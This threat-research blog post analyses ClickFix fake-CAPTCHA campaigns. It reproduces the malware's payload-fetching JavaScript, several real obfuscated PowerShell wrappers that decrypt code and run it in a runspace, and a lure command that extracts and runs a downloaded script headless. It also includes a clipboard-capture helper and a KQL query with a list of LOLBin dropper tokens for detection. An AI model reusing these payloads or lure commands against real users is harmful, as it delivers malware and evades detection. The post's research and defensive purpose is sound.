ClickFix: The Gift That Keeps On Giving

In the beginning of June I presented the session ClickFix: The Gift That Keeps On Giving at OrangeCon. ClickFix emerged around 2024 and, as described by SANS, saw a 517% increase in 2025; the effectiveness of this technique is something we will have to deal with for the upcoming years. Before diving into technical details, it is important to understand why ClickFix is so effective. The attack exploits fundamental user behaviors and training:

  1. We are trained to solve CAPTCHA challenges.
  2. A wide range of legitimate CAPTCHAs exists, so one more does not stand out.
  3. We are used to following instructions.
  4. A non-technical audience does not understand the impact of pasting a command.

This blog presents the findings and research conducted in preparation for the OrangeCon session. For the session, around 3,000 ClickFix payloads were investigated and multiple ClickFix platforms were reversed to shed some light on the ongoing operations.

Interested in the full session? Watch the recording on YouTube

ClickFix 101

ClickFix is an initial access/dropper technique that consists of three steps, as described in the flow by BitDefender:

  1. Deception: The user is shown a fake verification (CAPTCHA) page that instructs them to follow steps to continue.
  2. Clipboard Injection: Malicious JavaScript silently copies a command into the user’s clipboard.
  3. Execution: The user pastes and runs the command, unknowingly executing malware that connects to the attacker’s infrastructure.

/images/ClickFixGift/ClickFix101.png
ClickFix Steps (Right part of image source: BitDefender)

Delivery Methods

ClickFix campaigns reach users through two distinct methods:

Social Engineering Approach

  • Threat actors craft email messages designed to appear urgent or legitimate to lure victims.
  • Recipients are directed to dedicated ClickFix infrastructure.
  • Can be targeted at specific organizations or individuals.

Browsing-Based Infections

  • Users conducting routine search engine queries inadvertently land on malicious pages.
  • Compromised WordPress installations often serve as hosting platforms for ClickFix pages; vulnerable WordPress plugins are frequently exploited to inject the malicious CAPTCHA overlay.
  • A broad shotgun approach that depends on existing traffic to the compromised WordPress sites.

Execution Specializations

As detection and prevention evolved, threat actors developed different execution methods. This blog only deep-dives into the Windows-based methods, but be aware that macOS ClickFix campaigns are also active. On Windows there are two distinct methods to identify: Windows + R (Run dialog) and Windows + X (Power User menu).

/images/ClickFixGift/Methods.png
ClickFix Windows + R and Windows + X

Windows + Run (Run Dialog)

The original specialization emerged in 2024 and saw rapid adoption through 2025:

  • Triggered via the Windows + R keyboard shortcut
  • User is prompted to paste a command into the Run dialog
  • Executes as a child process of explorer.exe
  • Process chain: explorer.exe → cmd.exe, powershell.exe or any other LOLBin that makes an outbound connection

/images/ClickFixGift/WindowsRunProcMon.png
Windows + R Parent Child Relation

Windows + X (Power User Menu)

A newer specialization emerged in 2025 and rapidly gained adoption into 2026:

  • Triggered via the Windows + X keyboard shortcut
  • Lures the victim into pressing I (the menu accelerator for Terminal) or selecting Terminal
  • Opens the Windows Terminal application
  • PowerShell runs as the default shell
  • Process chain: WindowsTerminal.exe → powershell.exe

The shift toward Windows Terminal execution complicates detection logic: a powershell.exe child of WindowsTerminal.exe is what every interactive user produces all day, whereas explorer.exe spawning a shell with a long command line straight from the Run dialog stands out.

/images/ClickFixGift/WindowsXProcMon.png
Windows + X Parent Child Relation

Researching ClickFix Platforms

To understand the state of ClickFix in 2026 it was time to perform some research. I wanted to know the answers to the following questions:

  • How are payloads delivered to the clipboard?
  • What stage 2 loaders are used to deliver the payloads?
  • How have the obfuscation techniques evolved over the past two years?

The research was done by reverse engineering ClickFix payloads and performing data analytics on the thousands of ClickFix domains and payloads added to the ClickFix Hunter project.

JavaScript Obfuscation and Clipboard Injection

As any advanced reverse engineer does, the browser's developer tools were used to identify how payloads are delivered to the clipboard. The screenshot confirms our assumption: a compromised WordPress site is hosting a fake CAPTCHA.

ClickFix pages use obfuscated JavaScript to:

  1. Detect browser and operating system characteristics
  2. Craft OS-specific payloads
  3. Inject payloads into the user's clipboard
  4. Prompt users to paste and execute
  5. Deliver the lure text in the language of the visitor; the platforms support 25 different languages

/images/ClickFixGift/DifferentLanguage.png
ClickFix platform is supporting 25 different languages
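The helper below is an added example written for this post, not code from the ClickFix platform or from the original page. It captures what a suspected page tries to write to the clipboard by patching the three write paths a ClickFix page can use (navigator.clipboard.writeText, document.execCommand('copy') after selecting a hidden element, and a copy event handler calling clipboardData.setData), logging every attempt and dropping it so nothing reaches the real clipboard. It takes a window-like object as argument so it can also run against a constructed stub outside a browser; in DevTools, call installClipboardTap(window) before clicking the fake CAPTCHA and read the returned array afterwards.

```javascript
// Clipboard tap for ClickFix triage. Added example, not part of the original
// post or of the ClickFix platform code. In a browser: installClipboardTap(window).
function installClipboardTap(win) {
  const captured = [];
  const record = (via, text) =>
    captured.push({ via, text: String(text), at: new Date().toISOString() });

  // 1. Async Clipboard API: navigator.clipboard.writeText(payload).
  //    Replace the method on the instance and resolve, so the lure's promise
  //    chain continues as if the copy had succeeded.
  const clip = win.navigator && win.navigator.clipboard;
  if (clip && typeof clip.writeText === 'function') {
    clip.writeText = (text) => {
      record('navigator.clipboard.writeText', text);
      return Promise.resolve();
    };
  }

  // 2. Legacy path: payload in an off-screen <textarea>, select it, then
  //    document.execCommand('copy'). The payload is the current selection or,
  //    for a focused textarea/input, its value. Report success, copy nothing.
  const doc = win.document;
  const origExec = doc.execCommand;
  doc.execCommand = function (cmd, ...rest) {
    if (String(cmd).toLowerCase() === 'copy') {
      const sel = typeof doc.getSelection === 'function' ? doc.getSelection() : null;
      const active = doc.activeElement;
      const text = (sel && String(sel)) || (active && active.value) || '';
      record("document.execCommand('copy')", text);
      return true;
    }
    return typeof origExec === 'function' ? origExec.call(doc, cmd, ...rest) : false;
  };

  // 3. 'copy' event handler: e.clipboardData.setData('text/plain', payload).
  //    A capturing listener on window runs before any handler the page
  //    registered, so setData is wrapped on the very event object the page's
  //    handler will receive; the data is recorded and never set.
  win.addEventListener('copy', (e) => {
    if (!e.clipboardData || typeof e.clipboardData.setData !== 'function') return;
    e.clipboardData.setData = (type, data) => record('copy event setData ' + type, data);
  }, true);

  return captured;
}

// Reduce the captures to the distinct command strings: this is what would end
// up in the Run dialog or the terminal if the victim followed the lure.
function distinctPayloads(captured) {
  return [...new Set(captured.map((c) => c.text).filter((t) => t.length > 0))];
}
```

Because the tap never forwards to the original APIs, the analysis machine's clipboard stays clean even if the page fires several writes; distinctPayloads() collapses the repeated attempts most lures make into the handful of actual commands.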

CPaaS: Payload Delivery as a Platform

The JavaScript characteristics above are expected and not surprising, but they are not all the script contains. One of the more notable findings in researching this ClickFix operation is the existence of a structured ClickFix Payload-as-a-Service (CPaaS) infrastructure. Rather than a single hard-coded payload, a payload is loaded per visitor from a backend that is organized, API-driven and designed for scalability.

/images/ClickFixGift/CPaaS.png
CPaaS: ClickFix Payload as a Service

Threat actors have implemented backend API endpoints that:

  • Accept requests for payloads
  • Use access tokens for authentication
  • Generate unique, obfuscated payloads dynamically
  • Return different obfuscation methods each time
  • Log metadata including timestamps and request parameters

The payload is retrieved dynamically in the function fetchPayload(), reproduced below from the captured module:

/images/ClickFixGift/FetchPayload.png
JavaScript Fetch Operation for Payload Retrieval

// cloudflare.js — ClickFix Cloudflare CAPTCHA module
// Loaded by JS loader from API server: ?a=js&mode=cloudflare
// Exports via window.__BW_MODE_RUN__

window.__BW_MODE_RUN__ = function(ctx) {
    // ctx contains: panelBaseUrl, apiBase, apiUrl, logUrl, tokenUrl, downloadUrl,
    //               mode, os, browser, country, storageKey, cfg, contractConfig

    // Fetch payload (PS command) from API server
    var currentPayload = '';
    var captchaMode = 1;
    function fetchPayload() {
        try {
            var url = ctx.downloadUrl || (ctx.apiBase + '/api/index.php?a=init');
            try {
                var _ps = new URLSearchParams(window.location.search);
                var _src = _ps.get('src') || window.location.hostname;
                if (url.indexOf('src=') === -1)
                    url += (url.indexOf('?') !== -1 ? '&' : '?') + 'src=' + encodeURIComponent(_src);
            } catch (ee) {}
            var xhr = new XMLHttpRequest();
            xhr.open('GET', url, true);
            xhr.onload = function() {
                if (xhr.status === 200) {
                    try {
                        var data = JSON.parse(xhr.responseText);
                        if (data.token)
                            currentPayload = data.token;
                        else if (data.payload)
                            currentPayload = data.payload;
                        else
                            currentPayload = xhr.responseText;
                        if (data.captcha_mode) {
                            console.log('[CF] captcha_mode from init:', data.captcha_mode);
                        }
                        if (data.captcha_mode === 2 && captchaMode !== 2) {
                            captchaMode = 2;
                            rerenderSteps();
                        }
                    } catch (e) {
                        if (xhr.responseText.length > 5)
                            currentPayload = xhr.responseText;
                    }
                    syncCfId();
                }
            };
            xhr.send();
        } catch (e) {}

        // Also try cfg payload
        if (ctx.cfg && ctx.cfg.payload) {
            currentPayload = ctx.cfg.payload;
            syncCfId();
        }
        if (ctx.cfg && ctx.cfg.captcha_mode === 2)
            captchaMode = 2;
    }

    // ... remainder of the module (including rerenderSteps() and syncCfId(),
    // referenced above, and the clipboard write) not reproduced here
};

Research CPaaS API

If you do security research you often go on side quests, and this research had one related to payloads. I did not expect to find CPaaS infrastructure behind a random ClickFix campaign, but once I did I needed answers. It was time to do a little digging to understand how it worked.

To understand what payloads are returned I requested 100 payloads from the CPaaS platform; a subset of the responses is added to this blog. These 100 payloads resulted in the following conclusions:

  • 100 unique payloads observed (no payload reuse)
  • Multiple obfuscation techniques employed dynamically (AES, TripleDES, Deflate)
  • Deobfuscating each wrapper yields identical malicious code
  • Every wrapper executes the decrypted script in a PowerShell runspace, for in-memory execution and obfuscation reasons

In this particular campaign the obfuscated payload is unique per request, but once decoded the inner payload is the same. The wrappers are clearly machine-generated: payload 1 below assigns $record9m twice, so its Key and IV both refer to the second value, which looks like a variable-name collision in the generator.

/images/ClickFixGift/CPaasResultsDeobfuscated.png
Deobfuscated Payloads

[
    {
        "index":  1,
        "timestamp":  "2026-05-14T13:53:21.2886856+01:00",
        "source":  "https://babybon.cfd/api/index.php?q=IwvO43BY7yTFPPxkFys",
        "payload":  "$record9m=[Convert]::FromBase64String(\u0027jFcGdKEaozRvCRFaOJ+aDH1YWl73BIcjiGdhjvrGeBU=\u0027);$record9m=[Convert]::FromBase64String(\u0027I1c58dS81nJ1bkLJc3XOGg==\u0027);$packet4k=[Convert]::FromBase64String(\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\u0027);$stream9m=[Security.Cryptography.Aes]::Create();$stream9m.Key=$record9m;$stream9m.IV=$record9m;$stream9m.Mode=\u0027CBC\u0027;$stream9m.Padding=\u0027PKCS7\u0027;$block0g=[Text.Encoding]::UTF8.GetString($stream9m.CreateDecryptor().TransformFinalBlock($packet4k,0,$packet4k.Length));$stream9m.Dispose();$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript($block0g);$pp.Invoke();$rs.Close();exit"
    },
    {
        "index":  2,
        "timestamp":  "2026-05-14T13:53:27.3626484+01:00",
        "source":  "https://babybon.cfd/api/index.php?q=IwvO43BY7yTFPPxkFys",
        "payload":  "$content5e=[IO.MemoryStream]::new([Convert]::FromBase64String(\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\u0027));$response3f=[IO.MemoryStream]::new();[IO.Compression.DeflateStream]::new($content5e,[IO.Compression.CompressionMode]::Decompress).CopyTo($response3f);$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript([Text.Encoding]::UTF8.GetString($response3f.ToArray()));$pp.Invoke();$rs.Close();exit"
    },
    ...
        {
        "index":  98,
        "timestamp":  "2026-05-14T14:04:16.8138217+01:00",
        "source":  "https://babybon.cfd/api/index.php?q=IwvO43BY7yTFPPxkFys",
        "payload":  "$result3f=[Convert]::FromBase64String(\u0027Ktz7+VB4Dgh+S56QnsQ9b+yTEZcDEmzCgWdqN5NP1pg=\u0027);$chunk9m=[Convert]::FromBase64String(\u0027yzRZXgDE5aS/KI7N/mBfuQ==\u0027);$stream2b=[Convert]::FromBase64String(\u0027/bFMPD/YP0D26aQPJnYV8P0QL5S8pn4WHRmqijcKp7cu2w5nU59xIRkCp+xhWyePp1XY7zgh99ONxTaB7riYIsIGQNlif6k6CnOfX+QYV3mPCnGUV3+2tqepvx8cAzbBQcakOtFOUe6qOh/O/2uIvneoxv+T7swbXdOXqgFJYFeYxPGRXiQ7lEhr15FNXSc7sL85Fq+Pji3Nbrg9DP/FCi0eTaKECGBDxxEaTlbTGESGrqUO+IMbrD9MtiYmGJksbKfohH5Pa9+w9voMW/Ou9kC5KIdId/sM7y+qPVWvKOS0smI0FCvr1mqyV/unMChYe0/npvXkFMoPdqd8ahS1zWokuYv6cc0vBvSLKh/jyNIwn/++3aVbdJDVUZxwQd40PeXrHTWeEXNM3rqZBx4oBwwGBqMaWFd1dfLqOds5KllumpzG3ZgVO2++h4AcjCC/j4+syH8J+krOuCtol8wh99XlhDU9Oz4z4WfyCBdqaN0FT9Vci20Wp2XLS2/rHGtZNajI9k+bisB4JOKZhPU+ApdlIDAQp85GiwVe2jacP0SQ5vqNgru1q6IOgEMyCRAKWLM5+1GVva/E/Yc/DfbCl52pvFyxVkBlR7bbywh5WuPFTUAJIaI1ztjJknQIh+Nv/WvpFFn7fRixIgC+L0158+6wXh6YAVhtS566wrgZkRvvZlA4GBOEFGpEtY9bIktOJ0FV4+3gjPpiPmKp0ENuzMlgNIaj8mkK3xkZfaftAs1jgLAq5a9+N92pj9NicsDgwvPQRdo6/Ot4qIQFVL8UdcAt6tf4L9SCZYB6+S4PM8l/K1Uq4bmSrDP4MKC8Vlb+oNjuQfAGJdrvfXXQyy4vJw8gSK/QZ+j+DxoWYbDrWbARIOIBO8eCGjuK1mtm3HsueyBqdD/ckcnjn3wxyrj3yS/oWR2tCioFceaYA8nKaDY1v+0bLe2bBmsMTkYzGamjruI9lueAZTlpSLPmQ88TLu70zYcLHAlcdBcgNXFKnix2T6Zv7065bIXwpDlqFkWa+i7x6eTi+uqiysZbxNIhtJpLrRgPjS3OKleta8SoxVgz0mslu+JS8yRIOSx6/2siNGZbFymFMslWuSDS1FNx7MsXUeo8ZRGvzSaEYajjjg574M1QbsW3wqMmSXHF3rQX\u0027);$content9m=[Security.Cryptography.Aes]::Create();$content9m.Key=$result3f;$content9m.IV=$chunk9m;$content9m.Mode=\u0027CBC\u0027;$content9m.Padding=\u0027PKCS7\u0027;$result5e=[Text.Encoding]::UTF8.GetString($content9m.CreateDecryptor().TransformFinalBlock($stream2b,0,$stream2b.Length));$content9m.Dispose();$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript($result5e);$pp.Invoke();$rs.Close();exit"
    },
    {
        "index":  99,
        "timestamp":  "2026-05-14T14:04:19.8957583+01:00",
        "source":  "https://babybon.cfd/api/index.php?q=IwvO43BY7yTFPPxkFys",
        "payload":  "$chunk7x=[Convert]::FromBase64String(\u0027lVdZkhRmBSHuK0qJ2XyABBPS4rqZzRShA+H5E7DDIP8=\u0027);$segment4k=[Convert]::FromBase64String(\u0027I7LvI/Lh7Jb0o8r3DI26Ug==\u0027);$stream5e=[Convert]::FromBase64String(\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\u0027);$buffer5e=[Security.Cryptography.Aes]::Create();$buffer5e.Key=$chunk7x;$buffer5e.IV=$segment4k;$buffer5e.Mode=\u0027CBC\u0027;$buffer5e.Padding=\u0027PKCS7\u0027;$stream8d=[Text.Encoding]::UTF8.GetString($buffer5e.CreateDecryptor().TransformFinalBlock($stream5e,0,$stream5e.Length));$buffer5e.Dispose();$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript($stream8d);$pp.Invoke();$rs.Close();exit"
    },
    {
        "index":  100,
        "timestamp":  "2026-05-14T14:04:22.0036431+01:00",
        "source":  "https://babybon.cfd/api/index.php?q=IwvO43BY7yTFPPxkFys",
        "payload":  "$data4k=[Security.Cryptography.TripleDES]::Create();$data4k.Key=[Convert]::FromBase64String(\u0027KF0oKBfK7z4Uit01oqzmmY7U8o+v2kc2\u0027);$data4k.IV=[Convert]::FromBase64String(\u00273cSSMwvFufk=\u0027);$data9m=[Convert]::FromBase64String(\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\u0027);$result0g=[Text.Encoding]::UTF8.GetString($data4k.CreateDecryptor().TransformFinalBlock($data9m,0,$data9m.Length));$data4k.Dispose();$rs=[runspacefactory]::CreateRunspace();$rs.Open();$pp=$rs.CreatePipeline();$pp.Commands.AddScript($result0g);$pp.Invoke();$rs.Close();exit"
    }
]

Payload Characteristics: Obfuscation Techniques

Analysis of the collected payloads revealed consistent patterns in the obfuscation strategies:

Obfuscation Methods Observed

  • Base64 encoding: the outer layer in every payload, wrapping keys, IVs and ciphertext
  • AES encryption: symmetric encryption in CBC mode with PKCS7 padding, key and IV embedded in the payload
  • TripleDES encryption: an alternative symmetric cipher, again with embedded key and IV
  • Rijndael encryption: the legacy .NET Rijndael classes, which with the default 128-bit block size are AES under another name
  • Deflate compression: raw DEFLATE via System.IO.Compression.DeflateStream, seen on its own (payload 2 above) and combined with encryption

PowerShell RunSpace Execution

A critical finding: all payloads use PowerShell runspaces for execution.

$rs = [runspacefactory]::CreateRunspace()
$rs.Open()
$pp = $rs.CreatePipeline()
$pp.Commands.AddScript($decodedPayload)
$pp.Invoke()
$rs.Close()

Why runspaces are used:

  • Executes the decrypted script in memory inside the already running PowerShell process, without spawning a powershell.exe child process
  • Bypasses many process-based detections: the process tree ends at the wrapper
  • The decrypted script never appears on a command line, so traditional command-line analysis only ever sees the wrapper
  • Is often described as avoiding AMSI (Antimalware Scan Interface); note, however, that the text passed to AddScript() is still compiled by the PowerShell engine, so AMSI and Script Block Logging (Event ID 4104) do see the decrypted script

This indicates threat actor awareness of modern defensive capabilities and deliberate evasion of process-level detections.


Stage 2 Loaders: Living off the Land

After initial execution, ClickFix payloads employ Living-off-the-Land Binaries (LOLBins) to download and execute secondary stages.

LOLBin Usage Statistics

Analysis of ~3,000 ClickFix payloads from the ClickFix Hunter project revealed the following stage 2 loaders. Percentages are of all entries; a single payload can reference several LOLBins, so the column does not add up to 100%:

LOLBin                                     Count    Percentage
PowerShell                                 1,170    39.0%
cmd                                        1,169    38.9%
msiexec                                    1,019    33.9%
curl                                         268     8.9%
net                                          183     6.1%
mshta                                        124     4.1%
AppV Sync (syncappvpublishingserver.vbs)      44     1.5%
wscript                                       37     1.2%
ssh                                            8     0.3%
rundll32                                       4     0.1%
regsvr32                                       2     0.1%
bitsadmin                                      1     0.0%
wmic                                           1     0.0%

/images/ClickFixGift/Results.png
Stage 2 Loaders Used in ClickFix Campaigns

Key observations:

  • PowerShell and cmd dominate: each appears in roughly 39% of the payloads; because one payload can contain both, the two figures cannot simply be added
  • Multi-method payloads: payloads often include fallback LOLBins, which is why the percentages overlap
  • msiexec prevalence: used to download and install an MSI package in a single step
  • curl popularity: direct HTTP download of secondary payloads

The prevalence of PowerShell and cmd reflects their universal availability and powerful scripting capabilities.

Technical Deep Dive: Payload Analysis

ClickFix Hunter Project

The stage 2 analysis uses the data of the ClickFix Hunter project (clickfix.carsonww.com), roughly 3,000 entries. The entries were downloaded and loaded into Azure Data Explorer (ADX) to analyze them with KQL.

The following KQL query tokenizes each pasted command line, extracts the LOLBins it references and normalizes their names so that variants such as powershell, iex and iwr count as one loader:

// Tokens that identify a stage 2 loader in the pasted command line
let dropper_tokens = dynamic([
    "powershell", "powershell.exe", "pwsh", "pwsh.exe", "iwr", "iex",
    "cmd", "cmd.exe",
    "msiexec", "msiexec.exe",
    "curl", "curl.exe",
    "wget", "wget.exe",
    "rundll32", "rundll32.exe",
    "regsvr32", "regsvr32.exe",
    "wscript", "wscript.exe",
    "cscript", "cscript.exe",
    "schtasks", "schtasks.exe",
    "bitsadmin", "bitsadmin.exe",
    "mshta", "mshta.exe",
    "certutil", "certutil.exe",
    "wmic", "wmic.exe",
    "net", "net.exe",
    "ssh", "ssh.exe",
    "syncappvpublishingserver.vbs"
]);
OrangeCon_ClickFix
| extend Commandline = tolower(commandline)
| extend TargetOS = case(
    Commandline has @"/bin/bash", "MacOS",
    "Windows"
)
| extend Parsedcommandline = parse_command_line(Commandline, "windows")
| extend DropperPrograms = set_intersect(Parsedcommandline, dropper_tokens)
| where TargetOS == "Windows"
| project-away commandline
| extend DropperPrograms = array_concat(DropperPrograms, pack_array(
    iff(Commandline has "iex", "iex", ""),
    iff(Commandline has "cmd", "cmd", ""),
    iff(Commandline has "bitsadmin", "bitsadmin", ""),
    iff(Commandline has "curl", "curl", ""),
    iff(Commandline has "syncappvpublishingserver.vbs", "syncappvpublishingserver.vbs", "")))
| mv-expand DropperPrograms
| where isnotempty(DropperPrograms)
| summarize count() by tostring(DropperPrograms)
| extend Matches = dynamic([])
| extend NormMatches = dynamic([])
| extend NormMatches = iff(DropperPrograms has_any ("powershell", "powershell.exe", "iex", "invoke-expression", "iwr", "invoke-webrequest"),
                           array_concat(NormMatches, dynamic(["powershell"])), NormMatches)
| extend NormMatches = iff(DropperPrograms has_any ("cmd", "cmd.exe"),
                           array_concat(NormMatches, dynamic(["cmd"])), NormMatches)
| extend NormMatches = iff(DropperPrograms has "bitsadmin",
                           array_concat(NormMatches, dynamic(["bitsadmin"])), NormMatches)
| extend NormMatches = iff(DropperPrograms has_any ("curl", "curl.exe"),
                           array_concat(NormMatches, dynamic(["curl"])), NormMatches)
| extend NormMatches = iff(DropperPrograms has "syncappvpublishingserver.vbs",
                           array_concat(NormMatches, dynamic(["appv_sync"])), NormMatches)
| extend Final = iff(array_length(NormMatches) > 0, NormMatches[0], DropperPrograms)
| summarize Total = sum(count_) by Stage2Loaders = Final
| sort by Total

Results

LOLBins are used in all Windows payload delivery methods. The query output follows; a few unnormalized variants such as msiexec.exe and rundll32.exe are listed separately from their short names:

  powershell 1,170
  cmd 1,169
  msiexec 1,019
  curl 268
  net 183
  mshta 124
  appv_sync 44
  wscript 37
  ssh 8
  rundll32.exe 4
  regsvr32 2
  msiexec.exe 2
  bitsadmin 1
  wmic 1


The game continues: New Payload Methods Spawn

A newer variant moves the malicious content out of the clipboard entirely:

  1. A fake CAPTCHA is shown.
  2. A file is downloaded to the victim's Downloads folder (tmp.zip in the observed sample).
  3. A command is silently copied to the clipboard.
  4. The victim executes the pasted command, which only points at the file in the Downloads folder: it moves the archive to %TMP%, extracts it with tar and runs the contained tmp.ps1 through conhost --headless. The pasted text references no remote host and contains nothing malicious for AMSI or a clipboard monitor to flag at that moment; the malicious logic lives in the downloaded file. The trailing comment is the lure text the victim sees in the Run dialog.

powershell -C "$t=$env:TMP;Move-Item \"$HOME\Downloads\tmp.zip\" \"$t\7947.zip\";tar -xf \"$t\7947.zip\" -C \"$t\";conhost --headless powershell -ExecutionPolicy Bypass -File \"$t\tmp.ps1\" #   "*  I am not a robot reCAPTCHA Verification ID:7947  *"

/images/ClickFixGift/DownloadsFolderMethod.png
New delivery technique using Downloads folder

Indicators of compromise

Identified CPaaS API servers (there are many more out there):

  • comicstar[.]lat
  • babybon[.]cfd
  • merkantalolol[.]asia

MITRE ATT&CK Alignment

ClickFix maps directly to T1204.004: User Execution: Malicious Copy and Paste (https://attack.mitre.org/techniques/T1204/004/), a technique that was added to the MITRE ATT&CK framework because of attacks like this one. The technique acknowledges that user-driven execution, in particular copy-and-paste operations, has become a significant attack vector. One description of the delivery side reads: “Legitimate WordPress websites are being abused to host malicious iframes or injected scripts that profile visitors based on the User-Agent to deliver OS-specific malware.” This matches the browsing-based infections described earlier, where vulnerable WordPress plugins are used to inject the fake CAPTCHA.

Conclusion

ClickFix is here to stay. The never ending game of attack versus defend will continue, and the technique keeps evolving to stay ahead of detection and prevention: Windows + X is more difficult to detect and prevent than Windows + R, CPaaS backends hand every visitor a unique wrapper, and the Downloads folder variant removes the malicious content from the clipboard altogether.